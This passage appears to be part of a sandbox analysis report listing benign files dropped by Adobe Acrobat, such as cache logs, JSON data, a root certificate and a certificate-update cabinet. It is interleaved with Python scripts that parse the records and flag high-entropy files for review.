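        if malicious or (is_pe and entropy >= entropy_threshold):
            flagged.append(rec["SHA-256"])
    return flagged


if __name__ == "__main__":
    recs = parse_records(SAMPLE_RECORDS)
    print(f"{len(recs)} records, {len(dedupe_by_sha256(recs))} unique by SHA-256")
    for digest in triage(recs):
        print("hunt:", digest)
```

Feed it the text of a real listing instead of SAMPLE_RECORDS; the entropy threshold is a heuristic and should be tuned against the File Type, since compressed archives and media legitimately sit near 8.0.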
                                                                                                                                                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):4099
                                                                                                                                                                                                                                              Entropy (8bit):5.228367526344799
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:96:QqBpCqGp3Al+NehBmkID2w6bNMhugoKTNY+No/KTNcygLPGLLUWCHES:rBpJGp3AoqBmki25ZEVoKTNY+NoCTNLq
                                                                                                                                                                                                                                              MD5:2F984E9E52415CEC6B43D2F12D9A3181
                                                                                                                                                                                                                                              SHA1:3F5752D3A7EE0323FF50F6DBF308EC1384CF7BC5
                                                                                                                                                                                                                                              SHA-256:3450245DE31F10E9598A166D2372B82E51DEF039CA1C358BFBC7295255B450B3
                                                                                                                                                                                                                                              SHA-512:DE16044E5BC9FAFD83F8A0AA4DDD5567F535BF9502B7543116E30BD15D421A4BED8FC4E937BFB6649618B52E3D5D47A8E34AF5103D003F4AE52117FD0FF8791C
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:*...#................version.1..namespace-.1a.o................next-map-id.1.Pnamespace-047a745d_5c98_4926_b446_942fb948d072-https://rna-resource.acrobat.com/.0.K..r................next-map-id.2.Snamespace-bdf2fbfe_e08b_407d_8a81_9a6094e373a0-https://rna-v2-resource.acrobat.com/.1.m.Fr................next-map-id.3.Snamespace-24b9c7f4_3e31_4d11_a607_ac91d6485c9e-https://rna-v2-resource.acrobat.com/.2.8.o................next-map-id.4.Pnamespace-bc60f291_faa7_4492_8b22_e186b4ce62c1-https://rna-resource.acrobat.com/.3.A-N^...............Pnamespace-047a745d_5c98_4926_b446_942fb948d072-https://rna-resource.acrobat.com/-j..^...............Pnamespace-bc60f291_faa7_4492_8b22_e186b4ce62c1-https://rna-resource.acrobat.com/[.|.a...............Snamespace-bdf2fbfe_e08b_407d_8a81_9a6094e373a0-https://rna-v2-resource.acrobat.com/....a...............Snamespace-24b9c7f4_3e31_4d11_a607_ac91d6485c9e-https://rna-v2-resource.acrobat.com/.W.@o................next-map-id.5.Pnamespace-8fb46ac3_c992_47ca_bb04_
                                                                                                                                                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):326
                                                                                                                                                                                                                                              Entropy (8bit):5.1965697311137715
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6:wJi6QL+q2P92nKuAl9OmbzNMxIFUt8XJiQG1Zmw+XJiQQLVkwO92nKuAl9OmbzNq:wEyv4HAa8jFUt8X+/+XGR5LHAa84J
                                                                                                                                                                                                                                              MD5:9E7BABA16942A0008E1FC3C617816B90
                                                                                                                                                                                                                                              SHA1:853E9CDD3B5E3D4C2FFDCD9EAF747D63643CD5DC
                                                                                                                                                                                                                                              SHA-256:FCF4B1A42A279728EFA4ADDE0780E39E7AD9445825AEDDEBF404A84B7C74EF11
                                                                                                                                                                                                                                              SHA-512:61B55999D6A30CE3505E69A703AF9EA30BFFA8725517E0BD81F12ADE34C412D6CB4849BED9D50E90099E353A08625A710EEF9DF2EDC6E1003E317F522B0C3BEB
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:2024/12/21-08:59:10.750 1d18 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/21-08:59:10.752 1d18 Recovering log #3.2024/12/21-08:59:10.752 1d18 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                                                                                                                                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):326
                                                                                                                                                                                                                                              Entropy (8bit):5.1965697311137715
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6:wJi6QL+q2P92nKuAl9OmbzNMxIFUt8XJiQG1Zmw+XJiQQLVkwO92nKuAl9OmbzNq:wEyv4HAa8jFUt8X+/+XGR5LHAa84J
                                                                                                                                                                                                                                              MD5:9E7BABA16942A0008E1FC3C617816B90
                                                                                                                                                                                                                                              SHA1:853E9CDD3B5E3D4C2FFDCD9EAF747D63643CD5DC
                                                                                                                                                                                                                                              SHA-256:FCF4B1A42A279728EFA4ADDE0780E39E7AD9445825AEDDEBF404A84B7C74EF11
                                                                                                                                                                                                                                              SHA-512:61B55999D6A30CE3505E69A703AF9EA30BFFA8725517E0BD81F12ADE34C412D6CB4849BED9D50E90099E353A08625A710EEF9DF2EDC6E1003E317F522B0C3BEB
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:2024/12/21-08:59:10.750 1d18 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/21-08:59:10.752 1d18 Recovering log #3.2024/12/21-08:59:10.752 1d18 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                                                                                                                                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                                                              File Type:PC bitmap, Windows 3.x format, 107 x -152 x 32, cbSize 65110, bits offset 54
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):65110
                                                                                                                                                                                                                                              Entropy (8bit):1.5660255405159125
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:384:CqiWecVTs1o+o6DX7B8wOCknAhhhMCc8opQChqlohhhhhhhhhhhhhhhhxhhjhhhw:CqiWecVg1o+fDX7rknAhhhMCzo5hqlV
                                                                                                                                                                                                                                              MD5:B34ACB9DC146C155645C4C9A83E5E364
                                                                                                                                                                                                                                              SHA1:B14949991256F63C163946B479BB9BD511536472
                                                                                                                                                                                                                                              SHA-256:840AD703F8094E492DDC8601B3FE979888A767C6FEF10B311F1DACCD7957C531
                                                                                                                                                                                                                                              SHA-512:F14C81FC286431BB870A142B6D4652BA617742D965BCE96A7E455C67978C0FE3D5DFD21C660F5B276FA3390D5977A4DC5E2170CBB1B991AAC45737E326291CFF
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:BMV.......6...(...k...h..... ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                                                                                                              File Type:Certificate, Version=3
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):1391
                                                                                                                                                                                                                                              Entropy (8bit):7.705940075877404
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
                                                                                                                                                                                                                                              MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
                                                                                                                                                                                                                                              SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                                                                                                                                                                                                                                              SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
                                                                                                                                                                                                                                              SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:0..k0..S............@.YDc.c...0...*.H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0...*.H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I.....*.A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.|C.t..t.....0.[q6....00\H..;..}`...).........A.......|.;F.H*..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..|o..;.....'...}~.."......
                                                                                                                                                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                                                                                                                              File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):71954
                                                                                                                                                                                                                                              Entropy (8bit):7.996617769952133
                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                              SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                                                                                                                                                                                                              MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                                                                                                                                                                                              SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                                                                                                                                                                                              SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                                                                                                                                                                                              SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...
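Every dropped-file record above carries an 8-bit Shannon entropy and an Encrypted flag, and the two track each other: the X.509 certificate at 7.71 bits/byte is not flagged, while the 71954-byte authroot.stl cabinet at 7.997 bits/byte is, even though it is a plain compressed CAB rather than an encrypted payload. The script below is an added example and not part of the Joe Sandbox report or its tooling. It parses records in the report's Key:Value layout, recomputes entropy the same way (bits per byte), and picks out records worth a second look. The 7.9 bits/byte cut-off, the reason labels and the two-record sample input (copied from the entries above, with the SSDEEP, SHA1, SHA-512 and Preview lines omitted) are this example's own assumptions; the page does not state the threshold Joe Sandbox actually uses.

```python
from __future__ import annotations

import math
from collections import Counter

# Constructed sample input: two dropped-file records copied from the report
# above in its "Key:Value" layout (SSDEEP/SHA1/SHA-512/Preview lines omitted).
SAMPLE_RECORDS = """\
Process:C:\\Program Files\\Adobe\\Acrobat DC\\Acrobat\\acrocef_1\\AcroCEF.exe
File Type:Certificate, Version=3
Category:dropped
Size (bytes):1391
Entropy (8bit):7.705940075877404
Encrypted:false
MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
Malicious:false
Process:C:\\Program Files\\Adobe\\Acrobat DC\\Acrobat\\acrocef_1\\AcroCEF.exe
File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
Category:dropped
Size (bytes):71954
Entropy (8bit):7.996617769952133
Encrypted:true
MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
Malicious:false
"""

# Assumed cut-off for "looks encrypted or compressed". Joe Sandbox's own
# threshold is not documented on the page; 7.9 separates the two samples.
HIGH_ENTROPY = 7.9


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte: 0.0 for a constant byte
    stream, 8.0 for a uniform distribution over all 256 byte values."""
    if not data:
        return 0.0
    n = len(data)
    counts = Counter(data)
    return -sum((c / n) * math.log2(c / n) for c in counts.values())


def parse_records(text: str) -> list[dict[str, str]]:
    """Split the report's Key:Value lines into one dict per dropped file.
    A new record starts at each 'Process:' line. Only the first colon is a
    separator, so Windows paths such as C:\\... keep their drive letter."""
    records: list[dict[str, str]] = []
    current: dict[str, str] = {}
    for line in text.splitlines():
        key, sep, value = line.partition(":")
        if not sep:
            continue  # not a Key:Value line
        key, value = key.strip(), value.strip()
        if key == "Process" and current:
            records.append(current)
            current = {}
        current[key] = value
    if current:
        records.append(current)
    return records


def triage(records: list[dict[str, str]],
           threshold: float = HIGH_ENTROPY) -> dict[str, list[str]]:
    """Return {sha256: [reasons]} for records that deserve a second look:
    the report's Malicious or Encrypted flag is set, or the reported entropy
    is at or above the threshold. Records with no reason are left out."""
    hits: dict[str, list[str]] = {}
    for rec in records:
        reasons: list[str] = []
        if rec.get("Malicious", "").lower() == "true":
            reasons.append("report flags malicious")
        if rec.get("Encrypted", "").lower() == "true":
            reasons.append("report flags encrypted")
        entropy = float(rec.get("Entropy (8bit)", "0"))
        if entropy >= threshold:
            reasons.append(f"high entropy {entropy:.3f} bits/byte")
        if reasons:
            hits[rec["SHA-256"]] = reasons
    return hits


if __name__ == "__main__":
    # Sanity checks of the entropy function on constructed data.
    print(shannon_entropy(b"\x00" * 100))          # 0.0
    print(shannon_entropy(bytes(range(256)) * 4))  # 8.0
    for sha, why in triage(parse_records(SAMPLE_RECORDS)).items():
        print(sha, "->", "; ".join(why))
```

High entropy alone only says "compressed or encrypted"; the CAB here is a benign Windows root-certificate update that any CEF-based component fetches, so the entropy reason needs to be read together with the process that wrote the file and its file type before it is treated as a packed payload.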

Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:data
Category:dropped
Size (bytes):192
Entropy (8bit):2.7895108629891827
Encrypted:false
SSDEEP:3:kkFkl06ZEvfllXlE/HT8klxh1NNX8RolJuRdxLlGB9lQRYwpDdt:kKt6Z9T8sH7NMa8RdWBwRd
MD5:568FE5DDCB0DEEBC1CE52088D62ADDDC
SHA1:4FB2732C13577B6D989763E44EA8106B3C1EE374
SHA-256:C2C47EE15B3DCFF82B2D524C41FDA16E6C2BA787D146AD5ABE0B9FDDC4E25EFD
SHA-512:6D777CBF80AA7018D59E0DE3FA62C9943F835873253AA2A92BE9E634A74BE85AF91CA45BA71BA74B2539F171B26EBC68DB9ACECAABB2BA0A8C4E6C52E95037F4
Malicious:false
Preview:p...... ...........S..(....................................................... ..........W....................o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...

Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:data
Category:modified
Size (bytes):328
Entropy (8bit):3.247897867253902
Encrypted:false
SSDEEP:6:kKvM9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:HvDImsLNkPlE99SNxAhUe/3
MD5:898B5B01CAA167FF4DC5590C9AF269B4
SHA1:603A6F31B519A39E63091F6B81661233ADAFBB7B
SHA-256:81D2427AF4DC34DE5AFAF76471A04EDDF340400285E30F2C23BFBA2DDEE92006
SHA-512:D25D02E4ACE5E6BDD2BCF2498BBC81620AF19274730C9AE60566D1D9EC9DA45FABF39FE0967B8890EE58C031D6F24EDD53E5E53301CE2E4A19BBC88339E36762
Malicious:false
                                                                                                                                                                                                                                              Preview:p...... .........^..S..(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
                                                                                                                                                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                                                              File Type:PostScript document text
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):1233
                                                                                                                                                                                                                                              Entropy (8bit):5.233980037532449
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                                                                                                                                                                                                                                              MD5:8BA9D8BEBA42C23A5DB405994B54903F
                                                                                                                                                                                                                                              SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                                                                                                                                                                                                                                              SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                                                                                                                                                                                                                                              SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:PostScript document text
Category:dropped
Size (bytes):10880
Entropy (8bit):5.214360287289079
Encrypted:false
SSDEEP:192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
MD5:B60EE534029885BD6DECA42D1263BDC0
SHA1:4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
SHA-256:B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
SHA-512:52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
Malicious:false
Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:JSON data
Category:dropped
Size (bytes):295
Entropy (8bit):5.341458045803275
Encrypted:false
SSDEEP:6:YEQXJ2HXFDGSv2UJR+FIbRI6XVW7+0Y6e2xoAvJM3g98kUwPeUkwRe9:YvXKXcKiYpW7aZGMbLUkee9
MD5:56FA1E666643A545FFCF25FC77F4E028
SHA1:80F667605F9E2B74295BAAA718B6E312C2F6BDA2
SHA-256:F7C19BA4587C5FC399291BF801DCED2A64A615B60E348AC052FC5BBB0F2DD7E4
SHA-512:97FE65E6236C11EDAD3ECB28F78F2950E083E8F4179365445714F5F41B28A2A19A87A91AC12442C7B18289A95357BCEAB785E11C1418F095B982EF175339EF6A
Malicious:false
Preview:{"analyticsData":{"responseGUID":"a503acb5-4761-479e-a1ca-3dd77b83c43e","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1734966651892,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:JSON data
Category:dropped
Size (bytes):294
Entropy (8bit):5.280284655185208
Encrypted:false
SSDEEP:6:YEQXJ2HXFDGSv2UJR+FIbRI6XVW7+0Y6e2xoAvJfBoTfXpnrPeUkwRe9:YvXKXcKiYpW7aZGWTfXcUkee9
MD5:B78FA554082C0D49CB08FB5ECED3814B
SHA1:E9AB8CD26FF4022BE7D829F4DBC136D591B82E60
SHA-256:C562D630496D962E10E7A1FEFCE81BEF99F610C43DBB49622E5F165BEA437E0B
SHA-512:9000667713F2455533F7C1E73B59A28773379CF35349967588125ACE102CB77B9D526FC4D40DD40613EEAC9339D47823212609B07E79F8A2A7362B6D35275561
Malicious:false
Preview:{"analyticsData":{"responseGUID":"a503acb5-4761-479e-a1ca-3dd77b83c43e","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1734966651892,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                                                                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):294
                                                                                                                                                                                                                                              Entropy (8bit):5.258423569930476
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6:YEQXJ2HXFDGSv2UJR+FIbRI6XVW7+0Y6e2xoAvJfBD2G6UpnrPeUkwRe9:YvXKXcKiYpW7aZGR22cUkee9
                                                                                                                                                                                                                                              MD5:94C92C780608EDE5FF81087901FE5585
                                                                                                                                                                                                                                              SHA1:37F40DAAE60522662739A712B5BA91659317D7E1
                                                                                                                                                                                                                                              SHA-256:782E45BF96BCE6FEA5FBB57189DAA6F6B9AEA1ABB01545C84312CA1E2D656657
                                                                                                                                                                                                                                              SHA-512:C63CE3A4ACFB96C7ED20F6B74734786A6A92A7304D7F9E98E52C79FA11363FDEB15CAE89C6641D7554C30D5CC2EB38D0556301F9586DE9BD4C47EE4DDCF74661
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:{"analyticsData":{"responseGUID":"a503acb5-4761-479e-a1ca-3dd77b83c43e","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1734966651892,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                                                                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):285
                                                                                                                                                                                                                                              Entropy (8bit):5.319582315018127
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6:YEQXJ2HXFDGSv2UJR+FIbRI6XVW7+0Y6e2xoAvJfPmwrPeUkwRe9:YvXKXcKiYpW7aZGH56Ukee9
                                                                                                                                                                                                                                              MD5:351DAB9DDCD4B2AF430E27734F4E008A
                                                                                                                                                                                                                                              SHA1:BAE30A918BA7F6F94BF1E93CBAF97E2E38908302
                                                                                                                                                                                                                                              SHA-256:F92AAA59A33ED2D4786772083D49B425E95B40D66DC96AF854924158AA4ED56F
                                                                                                                                                                                                                                              SHA-512:17D09E0D0B059C16D2ACDA334F2767C99A82A45A877D46EA12DC48EA54E162BAB9F49CA0DA89638BD3EFEFF4849CD724CF0A87AFF4FD213DA15DD87DB22CEB53
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:{"analyticsData":{"responseGUID":"a503acb5-4761-479e-a1ca-3dd77b83c43e","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1734966651892,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                                                                                                                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):1123
                                                                                                                                                                                                                                              Entropy (8bit):5.6844257278763815
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:24:Yv6XcKnia+pLgE9cQx8LennAvzBvkn0RCmK8czOCCSSL:YvnKiLhgy6SAFv5Ah8cv/SL
                                                                                                                                                                                                                                              MD5:4AA76F24A3357F910DDFE62F17B2BF90
                                                                                                                                                                                                                                              SHA1:1DC0B017D00C2310F8E11482E4EE90A9E8451178
                                                                                                                                                                                                                                              SHA-256:67F3158F2EF600027493DEA65570C300BB20F30DB35693833A6B7DB993904658
                                                                                                                                                                                                                                              SHA-512:E0ADBDF7F2DCC78C5D141AB1B38D3CCF9B7815E21C112A70229A5001D765A975BC043C73E7B94995AF5DB1099BACF3705862291EE0DDB5E661E4730B16CD773C
                                                                                                                                                                                                                                              Malicious:false
